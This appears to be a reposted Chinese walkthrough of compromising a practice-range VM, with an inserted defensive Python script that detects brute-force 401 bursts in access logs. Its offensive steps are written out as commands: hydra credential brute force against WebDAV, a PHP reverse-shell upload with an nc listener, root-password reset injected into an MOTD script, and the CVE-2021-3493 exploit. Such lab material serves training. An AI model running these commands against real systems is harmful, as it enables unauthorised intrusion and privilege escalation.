Detailed walkthrough of penetrating a network security practice range (靶场)
2022-04-23 16:49:00 【InfoQ】
0x00 Environment configuration
0x01 Host discovery / port scanning
arp-scan -l
nmap -sV -sC -p- 192.168.26.131
0x02 Information gathering
dirsearch --url http://192.168.26.131
0x03 Password dictionary customization
cewl http://192.168.26.131 -w 192.168.26.131dict.txt
0x04 hydra password brute force
hydra -L 192.168.26.131dict.txt -P 192.168.26.131dict.txt 192.168.26.131 http-get /webdav -v
The account and password were brute-forced successfully; sure enough, the custom-generated dictionary works better. Now that we hold valid credentials for the webdav service, the next step is to use davtest, the WebDAV testing tool bundled with Kali, to check whether files can be uploaded. If they can, we can put a webshell directly onto the server and getshell to break through the perimeter.
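As an added defender-side example (not part of the original post), the following Python script shows how the hydra run above would look in the web server's access log and how to flag it: a burst of HTTP 401 responses from one client against the same path within a short window. The log lines are constructed; the Hydra user-agent string and the client addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined log format: client ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def detect_auth_bruteforce(lines, window=timedelta(seconds=60), threshold=10):
    """Flag (client, path) pairs with >= threshold HTTP 401s inside any sliding window."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == "401":
            failures[(rec["ip"], rec["path"])].append(rec["ts"])
    alerts = []
    for (ip, path), times in failures.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:  # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"ip": ip, "path": path, "failures": peak})
    return alerts

def sample_lines():
    """Constructed excerpt: 12 rapid 401s against /webdav from one client, one normal 200,
    and one isolated 401 from another client that should not be flagged."""
    base = datetime(2022, 4, 23, 16, 40, 0, tzinfo=timezone(timedelta(hours=8)))
    fmt = "%d/%b/%Y:%H:%M:%S %z"
    lines = [
        f'192.168.26.128 - - [{(base + timedelta(seconds=2 * i)).strftime(fmt)}] '
        f'"GET /webdav HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"'
        for i in range(12)
    ]
    lines.append(f'192.168.26.1 - - [{base.strftime(fmt)}] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"')
    lines.append(f'192.168.26.1 - - [{base.strftime(fmt)}] "GET /webdav HTTP/1.1" 401 459 "-" "Mozilla/5.0"')
    return lines
```

Running detect_auth_bruteforce(sample_lines()) yields a single alert for 192.168.26.128 against /webdav with 12 failures; the lone 401 from the other client stays below the threshold.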
0x05 WebDAV vulnerability
davtest -url http://192.168.26.131/webdav -auth yamdoot:Swarg
From the screenshot above we can see that a DAV connection can be established with the obtained credentials, and that directories can be created and files uploaded on the target. Of the uploaded file types, only txt, php and html are executed. So the getshell approach here is: upload a PHP reverse-shell file directly, have kali listen on a local port, then access the file to trigger execution and getshell.
cp /usr/share/webshells/php/php-reverse-shell.php . # copy Kali's bundled reverse-shell file to the current directory
vim php-reverse-shell.php # edit this file: change the ip to Kali's IP and the port to Kali's listening port
davtest -url http://192.168.26.131/webdav -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadloc rev.php
As the screenshot above shows, the reverse-shell file was uploaded to the target successfully. Next, listen on a local port on kali, then access this file to trigger execution and getshell.
nc -lnvp 4444 # kali listens on port 4444
http://192.168.26.131/webdav/rev.php # accessing this link triggers execution of the shell code
python3 -c "import pty;pty.spawn('/bin/bash')" # upgrade the shell to a proper tty
0x06 MOTD injection privilege escalation
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
# Command explanation:
Starting from the root directory, find regular files owned by root that are owner- and group-executable and writable by other users; for each match run ls -l to display it, with error messages redirected to /dev/null.
chitragupt
ssh [email protected]
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
vi /etc/update-motd.d/00-header # edit this file
echo 'root:123' | chpasswd # append this line at the end of the file; it uses chpasswd to change the root user's password to 123
0x07 CVE-2021-3493 privilege escalation:
scp exploit.c [email protected]:/home/inferno # upload the exp to the target
gcc exploit.c -o exploit # compile exploit.c and name the output file exploit
chmod +x exploit # grant exploit execute permission
./exploit # run the exp
Copyright notice
This article was created by [InfoQ]; please include the link to the original when reposting. Thank you.
https://yzsam.com/2022/04/202204231645272170.html